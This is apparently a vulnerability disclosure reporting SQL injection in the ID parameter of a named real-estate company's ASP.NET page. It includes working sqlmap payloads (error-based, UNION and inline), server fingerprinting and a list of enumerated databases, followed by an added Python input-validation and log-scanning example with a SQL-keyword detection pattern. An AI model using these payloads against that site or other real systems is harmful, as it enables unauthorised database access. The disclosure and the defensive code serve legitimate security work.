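2014-08-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-10-04: The vendor has actively ignored the vulnerability; details disclosed to the public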
What an imposing name.
The ID parameter of http://gy.evergrande.com/ObjectHouseInfo.aspx?ID=13 is vulnerable to SQL injection.
Place: GET
Parameter: ID
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: ID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (9466=9466) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113))))

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: ID=13 UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+CHAR(79)+CHAR(71)+CHAR(119)+CHAR(69)+CHAR(115)+CHAR(76)+CHAR(67)+CHAR(105)+CHAR(69)+CHAR(102)+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ID=(SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (6788=6788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] *hengda
[*] hengda2**
[*] mast**
[*] mod**
[*] msdb
[*] ReportServer$***
[*] ReportServer$***TempDB
[*] temp**
[*] tianmaidi**
~ Filter the input
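The filtering recommended above, as an added example (not code from the original report or from the affected site): this Python code applies an integer allow-list to the ID parameter and reuses the same check to flag suspect requests to ObjectHouseInfo.aspx in access logs. The function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Allow-list for the ID parameter: 1-9 ASCII digits and nothing else.
ID_RE = re.compile(r"[0-9]{1,9}")
# SQL keywords of the kind seen in the report's payloads; used only to label alerts.
SQL_HINTS = re.compile(r"\b(union|select|convert|char|case)\b", re.I)


def parse_id(raw):
    """Return the ID as an int, or None if it is not a plain ASCII integer."""
    if raw is not None and ID_RE.fullmatch(raw):
        return int(raw)
    return None


def scan_requests(urls, page="/objecthouseinfo.aspx"):
    """Return (url, reason) for each request to `page` whose ID fails the allow-list."""
    alerts = []
    for url in urls:
        parts = urlsplit(url)
        if parts.path.lower() != page:
            continue
        # parse_qsl percent-decodes values; ASP.NET treats query keys case-insensitively.
        values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
                  if k.lower() == "id"]
        if len(values) != 1:
            alerts.append((url, "missing-or-repeated-id"))
        elif parse_id(values[0]) is None:
            reason = "sql-tokens" if SQL_HINTS.search(values[0]) else "non-integer"
            alerts.append((url, reason))
    return alerts


# Constructed sample requests (not taken from real logs).
SAMPLE = [
    "/ObjectHouseInfo.aspx?ID=13",
    "/ObjectHouseInfo.aspx?ID=13%20UNION%20ALL%20SELECT%20NULL--",
    "/ObjectHouseInfo.aspx?id=(CONVERT(INT,(SELECT%20CHAR(113))))",
    "/ObjectHouseInfo.aspx?ID=13abc",
    "/ObjectHouseInfo.aspx?ID=13&ID=14",
    "/Default.aspx?ID=x",
]

if __name__ == "__main__":
    for url, reason in scan_requests(SAMPLE):
        print(reason, url)
```

Validation of this kind complements, and does not replace, binding ID as a typed parameter in the SQL query.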
Unable to contact the vendor, or the vendor actively declined